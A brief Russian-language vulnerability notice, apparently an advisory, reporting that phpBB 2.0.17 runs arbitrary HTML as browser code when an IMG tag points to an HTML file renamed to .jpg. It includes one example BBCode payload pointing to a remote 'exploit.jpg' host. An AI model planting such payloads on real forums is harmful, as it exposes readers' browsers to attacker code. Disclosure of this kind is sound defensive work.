В phpBB 2.0.17 обнаружена возможность
подключения произвольных HTML страниц.
Указав в теге IMG ссылку на произвольный HTML
файл, переименованный в jpg, можно выполнить
произвольный код в броузере
просматривающего форум.

Пример:

[img]http://theremotehost.com/exploit.jpg[/img]

 



Оставить мнение